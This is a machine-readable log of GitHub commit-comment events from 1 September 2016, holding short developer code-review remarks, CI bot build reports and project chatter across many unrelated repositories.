{"id":"4504576015","type":"CommitCommentEvent","actor":{"login":"juliemr"},"repo":{"name":"juliemr/ng2-test-seed"},"payload":{"comment":{"id":18869198,"position":21,"line":61,"path":"karma.conf.js","commit_id":"2520d46da50a17d8d58883f40a74d92516ca4e5a","created_at":"2016-09-01T19:20:43Z","updated_at":"2016-09-01T19:20:43Z","body":"Hah, I sure did 10 minutes ago. Fixing in a new commit :)"}},"created_at":"2016-09-01T19:20:43Z"}
{"id":"4504576844","type":"CommitCommentEvent","actor":{"login":"bmoore-msft"},"repo":{"name":"trailbot/azure-quickstart-templates"},"payload":{"comment":{"id":18869203,"position":5,"line":35,"path":"stampery-trailbot-ubuntu/azuredeploy.json","commit_id":"5b51eb243a7a00a2d70bb1ad7a849a57ecdfefba","created_at":"2016-09-01T19:20:53Z","updated_at":"2016-09-01T19:20:53Z","body":"more specifically here - remove the parameter and just use the var you have below - set the var's value to your default value or whatever you think is best for your workload. "}},"created_at":"2016-09-01T19:20:53Z"}
{"id":"4504581372","type":"CommitCommentEvent","actor":{"login":"ontouchstart"},"repo":{"name":"ontouchstart/swift3-playground"},"payload":{"comment":{"id":18869220,"position":3,"line":4,"path":"playground2book/Planets/README.md","commit_id":"b54388935dacbaee96117eec936eff18f4f6a63a","created_at":"2016-09-01T19:21:48Z","updated_at":"2016-09-01T19:21:48Z","body":"Demo: https://twitter.com/ontouchstart/status/771426948484653057"}},"created_at":"2016-09-01T19:21:48Z"}
{"id":"4504586340","type":"CommitCommentEvent","actor":{"login":"ScoobiFreeBSD"},"repo":{"name":"ScoobiFreeBSD/freebsd"},"payload":{"comment":{"id":18869233,"position":null,"line":null,"path":null,"commit_id":"2376fc13627db10a65bcab9d9091cbd8ff049e87","created_at":"2016-09-01T19:22:49Z","updated_at":"2016-09-01T19:22:49Z","body":"Yeah I've gone through different variants of the menu option wording and the kernel environment variable naming... figured it's trivial enough to let usability people decide."}},"created_at":"2016-09-01T19:22:49Z"}
{"id":"4504587415","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"lucasart/Stockfish"},"payload":{"comment":{"id":18869237,"position":null,"line":null,"path":null,"commit_id":"4a5000775defcabc5480f0d236474f1213000d13","created_at":"2016-09-01T19:23:02Z","updated_at":"2016-09-01T19:23:02Z","body":"Congrats!\r\nNice that this patch passes"}},"created_at":"2016-09-01T19:23:02Z"}
{"id":"4504591637","type":"CommitCommentEvent","actor":{"login":"roconnor-blockstream"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18869254,"position":null,"line":null,"path":null,"commit_id":"393977d800b5a1be040e111fd6da3d52b007ee0d","created_at":"2016-09-01T19:23:53Z","updated_at":"2016-09-01T19:23:53Z","body":"Without strategoxt, how are we supposed pretty print nixos's aterms?"}},"created_at":"2016-09-01T19:23:53Z"}
{"id":"4504592071","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18869257,"position":27,"line":27,"path":"src/test/incremental/change_crate_order/main.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-01T19:23:58Z","updated_at":"2016-09-01T19:23:58Z","body":"depend on label it always fail or always pass"}},"created_at":"2016-09-01T19:23:58Z"}
{"id":"4504592977","type":"CommitCommentEvent","actor":{"login":"Th2BOOS"},"repo":{"name":"Th2BOOS/reboot"},"payload":{"comment":{"id":18869259,"position":124,"line":124,"path":"launch.sh","commit_id":"0e8e05f26af7c545fdb00285442fc876cacd5b25","created_at":"2016-09-01T19:24:11Z","updated_at":"2016-09-01T19:24:11Z","body":"Dbcbc\r\n"}},"created_at":"2016-09-01T19:24:11Z"}
{"id":"4504595468","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18869266,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T19:24:40Z","updated_at":"2016-09-01T19:24:40Z","body":"@TheDiamondYT1 this is not bukkit, not even pc version"}},"created_at":"2016-09-01T19:24:40Z"}
{"id":"4504596744","type":"CommitCommentEvent","actor":{"login":"roconnor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18869269,"position":null,"line":null,"path":null,"commit_id":"393977d800b5a1be040e111fd6da3d52b007ee0d","created_at":"2016-09-01T19:24:55Z","updated_at":"2016-09-01T19:24:55Z","body":"Without strategox, how are we supposed to pretty print nix's aterms?"}},"created_at":"2016-09-01T19:24:55Z"}
{"id":"4504597885","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"paulhendricks/functools"},"payload":{"comment":{"id":18869273,"position":null,"line":null,"path":null,"commit_id":"3c819ef3f6e9343f1a8baeddda71fbfbaff1a1a8","created_at":"2016-09-01T19:25:10Z","updated_at":"2016-09-01T19:25:10Z","body":"[R/Truthy.R:22:10:](https://github.com/paulhendricks/functools/blob/3c819ef3f6e9343f1a8baeddda71fbfbaff1a1a8/R/Truthy.R#L22) *warning:* **no visible global function definition for ‘Existy’, Did you mean 'exists'?**\n```r\n​  return(Existy(.x) && identical(.x, True()))\n         ^~~~~~\n```\n[R/Truthy.R:22:38:](https://github.com/paulhendricks/functools/blob/3c819ef3f6e9343f1a8baeddda71fbfbaff1a1a8/R/Truthy.R#L22) *warning:* **no visible global function definition for ‘True’, Did you mean 'rug'?**\n```r\n​  return(Existy(.x) && identical(.x, True()))\n                                     ^~~~\n```"}},"created_at":"2016-09-01T19:25:10Z"}
{"id":"4504602202","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18869280,"position":null,"line":null,"path":null,"commit_id":"8e0233befb48e2863dff74c4705948b3c62395ec","created_at":"2016-09-01T19:25:58Z","updated_at":"2016-09-01T19:25:58Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3898\n"}},"created_at":"2016-09-01T19:25:58Z"}
{"id":"4504602494","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869281,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:26:02Z","updated_at":"2016-09-01T19:26:02Z","body":"Probably should also mention... most of these dldi files aren't even tested...\r\n\r\nI know the r4idsn and ex4tf work but those are all I know of so far...\r\n\r\nI'd imagine a bunch of others would work too but of course things can be temperamental..."}},"created_at":"2016-09-01T19:26:02Z"}
{"id":"4504612057","type":"CommitCommentEvent","actor":{"login":"jstejada"},"repo":{"name":"nylas/N1"},"payload":{"comment":{"id":18869305,"position":17,"line":52,"path":"src/browser/application.es6","commit_id":"fbcb1e842c1c94d911eaf45cbd44e838504318e0","created_at":"2016-09-01T19:27:57Z","updated_at":"2016-09-01T19:27:57Z","body":"rm this"}},"created_at":"2016-09-01T19:27:57Z"}
{"id":"4504612698","type":"CommitCommentEvent","actor":{"login":"rajatkhemka"},"repo":{"name":"drishticone/2.0.0"},"payload":{"comment":{"id":18869306,"position":9,"line":416,"path":"student_activity/iei/index.php","commit_id":"8ab8940c678d092042ca43fa2f6ca54535d5ee1a","created_at":"2016-09-01T19:28:06Z","updated_at":"2016-09-01T19:28:06Z","body":"@anuradha27 this is third time I am mentioning that center tag need to be closed. I request you to read all comments of previous few commits."}},"created_at":"2016-09-01T19:28:06Z"}
{"id":"4504615125","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869310,"position":127,"line":127,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"b56a22b545e881595829f0fbc10a4c79ec08dad2","created_at":"2016-09-01T19:28:35Z","updated_at":"2016-09-01T19:28:35Z","body":"Looks like this is the pattern used in all the other builtins, but this makes sense."}},"created_at":"2016-09-01T19:28:35Z"}
{"id":"4504615235","type":"CommitCommentEvent","actor":{"login":"kdaily"},"repo":{"name":"Sage-Bionetworks/synapseDocs"},"payload":{"comment":{"id":18869311,"position":null,"line":null,"path":null,"commit_id":"3d618f51d4a9ecd7fdd2ba3740f198c1be8529ca","created_at":"2016-09-01T19:28:36Z","updated_at":"2016-09-01T19:28:36Z","body":":-D"}},"created_at":"2016-09-01T19:28:36Z"}
{"id":"4504630355","type":"CommitCommentEvent","actor":{"login":"ilevkivskyi"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18869337,"position":24,"line":267,"path":"pep-0526.txt","commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T19:31:34Z","updated_at":"2016-09-01T19:31:34Z","body":"The term \"annotates\" is not very clear here (since no annotation is stored at runtime in this case). I would propose either remove these comments, or say something like \"indicates to a type checker that type of c.x should be int\" etc."}},"created_at":"2016-09-01T19:31:34Z"}
{"id":"4504635846","type":"CommitCommentEvent","actor":{"login":"Cilenco"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18869347,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T19:32:30Z","updated_at":"2016-09-01T19:32:30Z","body":"New version (1.0.1) is up! Maybe it is better for you to use `compile 'com.cilenco.libraries:featurediscovery:+'` to always get the newest version of the library automatically. If you find any more bugs let me know +1 (but maybe better in the issues section) "}},"created_at":"2016-09-01T19:32:30Z"}
{"id":"4504636056","type":"CommitCommentEvent","actor":{"login":"luengnat"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18869348,"position":null,"line":null,"path":null,"commit_id":"1adf3f020e91bf4525f5b5fe0120d5e04f5c1d14","created_at":"2016-09-01T19:32:32Z","updated_at":"2016-09-01T19:32:32Z","body":"Let me try "}},"created_at":"2016-09-01T19:32:32Z"}
{"id":"4504638560","type":"CommitCommentEvent","actor":{"login":"ilevkivskyi"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18869353,"position":38,"line":273,"path":"pep-0526.txt","commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T19:32:57Z","updated_at":"2016-09-01T19:32:57Z","body":"I would propose to add an explanation why you are using such example - to show that this situation is considered not a simple name but an expression, and therefore annotations are not stored at runtime."}},"created_at":"2016-09-01T19:32:57Z"}
{"id":"4504638830","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18869354,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:33:00Z","updated_at":"2016-09-01T19:33:00Z","body":"@liskin:\nI am sorry that I do not have exact numbers for you from years of finding\nout what works and is scalable vs. what doesn't.\nI am sorry that the real world of X11 does not match up with your aesthetic\npreferences wrt `startupHook`.\nI am sorry that I am having to deal with this while I am not healthy.\nI am sorry I had anything to do with this, at this point. It's not worth it.\n\nI don't have the energy to deal with yet another instance of someone who is\nsure they Know Better than something as completely useless as long\nexperience and insist that things known to not be scalable are the only\nCorrect way to do it.\n\nOn Thu, Sep 1, 2016 at 3:05 PM, Bogdan Sinitsyn <notifications@github.com>\nwrote:\n\n> @liskin <https://github.com/liskin> but why shouldn't *startup* function\n> be in a *startup* hook?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xmonad/xmonad-contrib/commit/28e9f8bce781e6511b75a1c1e35f1cea4cecfefe#commitcomment-18868993>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB8SoGY-hFgdMf7V9AwpLIfVrU7a8mrUks5qlyIAgaJpZM4Jyf-5>\n> .\n>\n\n\n\n-- \nbrandon s allbery kf8nh                               sine nomine associates\nallbery.b@gmail.com                                  ballbery@sinenomine.net\nunix, openafs, kerberos, infrastructure, xmonad        http://sinenomine.net\n"}},"created_at":"2016-09-01T19:33:00Z"}
{"id":"4504641667","type":"CommitCommentEvent","actor":{"login":"RoaddogLabs"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":18869364,"position":null,"line":null,"path":null,"commit_id":"ddc39728400aeca738c58d2c71b2b7478fa8fb92","created_at":"2016-09-01T19:33:31Z","updated_at":"2016-09-01T19:33:31Z","body":"Would a brief overview of branches and pull requests be helpful?  I can also contribute work to the collaboration docs if it's a priority."}},"created_at":"2016-09-01T19:33:31Z"}
{"id":"4504650980","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18869389,"position":null,"line":null,"path":null,"commit_id":"da557b56b97e3f6b81b46dd0c60065761015412b","created_at":"2016-09-01T19:35:21Z","updated_at":"2016-09-01T19:35:21Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.240.da557b56b97e3f6b81b46dd0c60065761015412b](http://build.palaso.org/viewLog.html?buildId=76372&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:07:30"}},"created_at":"2016-09-01T19:35:21Z"}
{"id":"4504651112","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18869391,"position":338,"line":338,"path":"css/style_sedona.css","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-01T19:35:22Z","updated_at":"2016-09-01T19:35:22Z","body":"Комбинируй такие куски в один: `padding: 10px 30px 10px 10px;`"}},"created_at":"2016-09-01T19:35:22Z"}
{"id":"4504651758","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869397,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:35:30Z","updated_at":"2016-09-01T19:35:30Z","body":"Also, have you thought about storing the animation in a animated gif and using a c++ library to decode each frame?\r\n\r\nIt may use more memory but it would save quite a bit in file size"}},"created_at":"2016-09-01T19:35:30Z"}
{"id":"4504652862","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18869401,"position":357,"line":357,"path":"css/style_sedona.css","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-01T19:35:43Z","updated_at":"2016-09-01T19:35:43Z","body":"`background-repeat` тут наверно?"}},"created_at":"2016-09-01T19:35:43Z"}
{"id":"4504653333","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18869403,"position":null,"line":null,"path":null,"commit_id":"be7181e83d8d4b23166b561747e63c85c05e9897","created_at":"2016-09-01T19:35:48Z","updated_at":"2016-09-01T19:35:48Z","body":"i3 is not broken for netinstall - not that I would know of! I found a way to make .extend.Xresources work and have already [adjusted it](https://github.com/manjaro/desktop-settings/commits/master/shared/skel/.Xresources)"}},"created_at":"2016-09-01T19:35:48Z"}
{"id":"4504654119","type":"CommitCommentEvent","actor":{"login":"ilevkivskyi"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18869404,"position":null,"line":null,"path":null,"commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-01T19:35:58Z","updated_at":"2016-09-01T19:35:58Z","body":"@kirbyfan64 \r\nYou should probably also change wording on lines 109-110 at beginning of section \"Specification\". Maybe change \"simple name\" to \"an expression\""}},"created_at":"2016-09-01T19:35:58Z"}
{"id":"4504654255","type":"CommitCommentEvent","actor":{"login":"wilsonianb"},"repo":{"name":"ripple/ripplecharts-frontend"},"payload":{"comment":{"id":18869405,"position":16,"line":16,"path":"src/app/validators/validator.tpl.html","commit_id":"ea038de3a6db04b29e3016151788525c4441a94b","created_at":"2016-09-01T19:35:59Z","updated_at":"2016-09-01T19:35:59Z","body":"`Aggreement` -> `Agreement`"}},"created_at":"2016-09-01T19:35:59Z"}
{"id":"4504654371","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"TBoneWiz/device_samsung_mondrianwifi"},"payload":{"comment":{"id":18869406,"position":null,"line":null,"path":null,"commit_id":"a9e26e71dca4d0e6f5e7b5c694d3febadfe5b33b","created_at":"2016-09-01T19:36:01Z","updated_at":"2016-09-01T19:36:01Z","body":"This doesn't do anything as it isn't being called by anything and it lacks Android.mk"}},"created_at":"2016-09-01T19:36:01Z"}
{"id":"4504654633","type":"CommitCommentEvent","actor":{"login":"bittelc"},"repo":{"name":"jreut/journal"},"payload":{"comment":{"id":18869409,"position":null,"line":null,"path":null,"commit_id":"f5266882f38a5fb0b854fa016d311b311055e36d","created_at":"2016-09-01T19:36:05Z","updated_at":"2016-09-01T19:36:05Z","body":"Solution - when meeting new people, first ask them \"when can I begin asking you personal questions\".\r\nAlternate solution - when meeting new people, ask them very personal question. If they make a bad face, scale back to a slightly less personal question, but still very personal. Repeat until desired face is made."}},"created_at":"2016-09-01T19:36:05Z"}
{"id":"4504658775","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869424,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:36:52Z","updated_at":"2016-09-01T19:36:52Z","body":"Yeah I wanted to so something similar to that. But I'm not good enough at coding to implement it this way. :("}},"created_at":"2016-09-01T19:36:52Z"}
{"id":"4504659443","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucasart/Stockfish"},"payload":{"comment":{"id":18869427,"position":null,"line":null,"path":null,"commit_id":"4a5000775defcabc5480f0d236474f1213000d13","created_at":"2016-09-01T19:37:00Z","updated_at":"2016-09-01T19:37:00Z","body":"Bravo Lucas!"}},"created_at":"2016-09-01T19:37:00Z"}
{"id":"4504660423","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":18869431,"position":247,"line":340,"path":"plugins/dicom_viewer/web_external/js/main.js","commit_id":"21366fb4a70db12cbe4b2939ce007f1967f903d9","created_at":"2016-09-01T19:37:13Z","updated_at":"2016-09-01T19:37:13Z","body":"That sounds reasonable\r\n\r\nSome potentially useful resources: http://www.dclunie.com/medical-image-faq/html/part2.html#DICOMOrientation"}},"created_at":"2016-09-01T19:37:13Z"}
{"id":"4504661848","type":"CommitCommentEvent","actor":{"login":"jonmcalder"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18869434,"position":null,"line":null,"path":null,"commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T19:37:30Z","updated_at":"2016-09-01T19:37:30Z","body":"Yeah we should probably investigate ways to improve on brevity here - there must be ways to handle it more efficiently. For the moment though I do think it's worth trying to stick to the approach of saving the objects first and then referencing them in different tests - this should at least facilitate some re-use. e.g. see here: https://github.com/jonmcalder/refactor/commit/861ea5671ffebdec1166a27df703f4bea87d6b9a"}},"created_at":"2016-09-01T19:37:30Z"}
{"id":"4504662220","type":"CommitCommentEvent","actor":{"login":"antma"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":18869436,"position":null,"line":null,"path":null,"commit_id":"29f6f1e12b301a7f450043a568a0418551b42b14","created_at":"2016-09-01T19:37:35Z","updated_at":"2016-09-01T19:37:35Z","body":"Maybe, it is worth to try increase pairingGroupSize up to 50.\r\n50^3 isn't so big, I think pairing function for that case will be work practically instantly. "}},"created_at":"2016-09-01T19:37:35Z"}
{"id":"4504662807","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869437,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:37:42Z","updated_at":"2016-09-01T19:37:42Z","body":"I've made test GIFs and they are quite small so increase ram usage wouldn't really be an issue."}},"created_at":"2016-09-01T19:37:42Z"}
{"id":"4504664285","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18869442,"position":null,"line":null,"path":null,"commit_id":"8e0233befb48e2863dff74c4705948b3c62395ec","created_at":"2016-09-01T19:38:00Z","updated_at":"2016-09-01T19:38:00Z","body":"fast-forwarding develop-2.2 to borshop-integration-1459-develop-2.2-job-switches = 679aba47"}},"created_at":"2016-09-01T19:38:00Z"}
{"id":"4504669417","type":"CommitCommentEvent","actor":{"login":"balcsida"},"repo":{"name":"balcsida/tachyons-css.github.io"},"payload":{"comment":{"id":18869458,"position":null,"line":null,"path":null,"commit_id":"d980b2828aa3ba21499aaaeab6e5c4d73d944af1","created_at":"2016-09-01T19:39:04Z","updated_at":"2016-09-01T19:39:04Z","body":"Savings: 76% – 7 MB total"}},"created_at":"2016-09-01T19:39:04Z"}
{"id":"4504669544","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18869461,"position":null,"line":null,"path":null,"commit_id":"52aed0782f4d7aa58c34aa98ceb8c02aa18ac3c6","created_at":"2016-09-01T19:39:06Z","updated_at":"2016-09-01T19:39:06Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/359/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T19:39:06Z"}
{"id":"4504670128","type":"CommitCommentEvent","actor":{"login":"kurt---"},"repo":{"name":"DWBN/nodejs-formula"},"payload":{"comment":{"id":18869465,"position":null,"line":null,"path":null,"commit_id":"6b7beda4704510022a8c3e366fcf9cfebc97ce18","created_at":"2016-09-01T19:39:13Z","updated_at":"2016-09-01T19:39:13Z","body":"But perhaps it would be better to rely on the npm-formula via include? "}},"created_at":"2016-09-01T19:39:13Z"}
{"id":"4504674741","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18869475,"position":739,"line":739,"path":"css/style_sedona.css","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-01T19:40:10Z","updated_at":"2016-09-01T19:40:10Z","body":"Аналогично, `margin` в одну строчку."}},"created_at":"2016-09-01T19:40:10Z"}
{"id":"4504676708","type":"CommitCommentEvent","actor":{"login":"natalieesk"},"repo":{"name":"twtiger/nameserver"},"payload":{"comment":{"id":18869479,"position":6,"line":11,"path":"serialization_test.go","commit_id":"46433098f771ce6237337a18634ea23592aca643","created_at":"2016-09-01T19:40:32Z","updated_at":"2016-09-01T19:40:32Z","body":"Ok sure. Done."}},"created_at":"2016-09-01T19:40:32Z"}
{"id":"4504681448","type":"CommitCommentEvent","actor":{"login":"ibilon"},"repo":{"name":"openfl/lime"},"payload":{"comment":{"id":18869497,"position":null,"line":null,"path":null,"commit_id":"87573bb26119cb4be4b3c4ef0ebc4042ecba59e3","created_at":"2016-09-01T19:41:31Z","updated_at":"2016-09-01T19:41:31Z","body":"We lose the callstack print for the missing assets with that commit,\r\nand with it the possibility to find out where the call was."}},"created_at":"2016-09-01T19:41:31Z"}
{"id":"4504683957","type":"CommitCommentEvent","actor":{"login":"kurt---"},"repo":{"name":"DWBN/nodejs-formula"},"payload":{"comment":{"id":18869508,"position":null,"line":null,"path":null,"commit_id":"6b7beda4704510022a8c3e366fcf9cfebc97ce18","created_at":"2016-09-01T19:42:04Z","updated_at":"2016-09-01T19:42:04Z","body":"Forget that comment.  Perhaps better replace this formula with https://github.com/saltstack-formulas/node-formula"}},"created_at":"2016-09-01T19:42:04Z"}
{"id":"4504686335","type":"CommitCommentEvent","actor":{"login":"mrjcleaver"},"repo":{"name":"afklm/jira"},"payload":{"comment":{"id":18869515,"position":null,"line":null,"path":null,"commit_id":"9a1656421e18f82e26e2f214cd48b2af22df17aa","created_at":"2016-09-01T19:42:32Z","updated_at":"2016-09-01T19:42:32Z","body":"This commit broke the build https://travis-ci.org/afklm/jira/builds/113158753"}},"created_at":"2016-09-01T19:42:32Z"}
{"id":"4504687903","type":"CommitCommentEvent","actor":{"login":"mrjcleaver"},"repo":{"name":"afklm/jira"},"payload":{"comment":{"id":18869516,"position":null,"line":null,"path":null,"commit_id":"9a1656421e18f82e26e2f214cd48b2af22df17aa","created_at":"2016-09-01T19:42:51Z","updated_at":"2016-09-01T19:42:51Z","body":"And it's been broken ever since.\r\n"}},"created_at":"2016-09-01T19:42:51Z"}
{"id":"4504689655","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869519,"position":26,"line":26,"path":"SeamCarve.Back/src/FileRepository/FileRepository.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:43:13Z","updated_at":"2016-09-01T19:43:13Z","body":"Consider reporting user absolute path. It might be confusing to see local path somewhere, and then trying to find out what was working directory. You can also make _storageFolder absolute path  in constructor. Also, constructor is good place for checking if specified string is directory at all (you do it then on every load and store operations). Constructor is good place for checking things that come from outside world and do not change. This is called class invariant: https://en.wikipedia.org/wiki/Class_invariant. "}},"created_at":"2016-09-01T19:43:13Z"}
{"id":"4504690866","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18869521,"position":7,"line":8,"path":"sedona-hotels.html","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-01T19:43:28Z","updated_at":"2016-09-01T19:43:28Z","body":"Сначала должны подключаться `normalize.css`, потом собственные стили."}},"created_at":"2016-09-01T19:43:28Z"}
{"id":"4504691673","type":"CommitCommentEvent","actor":{"login":"DarkKat-Rom"},"repo":{"name":"DarkKat-Rom/android_device_lge_hammerhead"},"payload":{"comment":{"id":18869523,"position":5,"line":12,"path":"sepolicy/mediaserver.te","commit_id":"c6a57f2c766d4136d204c7491410f49c0912ab05","created_at":"2016-09-01T19:43:38Z","updated_at":"2016-09-01T19:43:38Z","body":"Thanks, changing mediaserver to cameraserver does the trick.\r\nPermissive was just a workaround for the photo saving issue,\r\nbut permissive isn`t needed any more."}},"created_at":"2016-09-01T19:43:38Z"}
{"id":"4504692141","type":"CommitCommentEvent","actor":{"login":"ennorehling"},"repo":{"name":"eressea/server"},"payload":{"comment":{"id":18869524,"position":4,"line":4467,"path":"res/core/de/strings.xml","commit_id":"901cf97cb2629595b467374019ae71ad9e66ce00","created_at":"2016-09-01T19:43:44Z","updated_at":"2016-09-01T19:43:44Z","body":"Bug https://bugs.eressea.de/view.php?id=2232"}},"created_at":"2016-09-01T19:43:44Z"}
{"id":"4504693284","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18869525,"position":null,"line":null,"path":null,"commit_id":"0d8b16e3914ff380281d9ceb2ae3121d2593fa29","created_at":"2016-09-01T19:43:57Z","updated_at":"2016-09-01T19:43:57Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/360/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T19:43:57Z"}
{"id":"4504694682","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869527,"position":40,"line":40,"path":"SeamCarve.Back/src/FileRepository/FileRepository.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T19:44:15Z","updated_at":"2016-09-01T19:44:15Z","body":"File.ReadAllBytes(filePath)?"}},"created_at":"2016-09-01T19:44:15Z"}
{"id":"4504697310","type":"CommitCommentEvent","actor":{"login":"v0dro"},"repo":{"name":"v0dro/daru"},"payload":{"comment":{"id":18869534,"position":11,"line":73,"path":"lib/daru.rb","commit_id":"f9e89ffe54e28b228502df3f2ba78af629e3d1fb","created_at":"2016-09-01T19:44:47Z","updated_at":"2016-09-01T19:44:47Z","body":"^ Sounds better, yes."}},"created_at":"2016-09-01T19:44:47Z"}
{"id":"4504703743","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI_FriendsListColor"},"payload":{"comment":{"id":18869554,"position":null,"line":null,"path":null,"commit_id":"114c03add2ae80a752ff3925bfedbcb834271524","created_at":"2016-09-01T19:46:08Z","updated_at":"2016-09-01T19:46:08Z","body":":+1: "}},"created_at":"2016-09-01T19:46:08Z"}
{"id":"4504703852","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18869555,"position":null,"line":null,"path":null,"commit_id":"213160652e00deff3ffbba125d427d7a14ed3673","created_at":"2016-09-01T19:46:10Z","updated_at":"2016-09-01T19:46:10Z","body":"Sounds like an issue with `isCompatibleWith`.  It is called from `canAllocateFrontend`.\r\n\r\nYou need to add few eDebug on above functions and see what goes wrong. When tuner is configured as DVB-S the C/T channels should be active.\r\n\r\nThere are few commits in NimManager already merged on OpenPLi that fix few issues, please confider applying them. \r\n\r\nYou can find them here as well: https://github.com/athoik/enigma2/commits/mpcm\r\n\r\n"}},"created_at":"2016-09-01T19:46:10Z"}
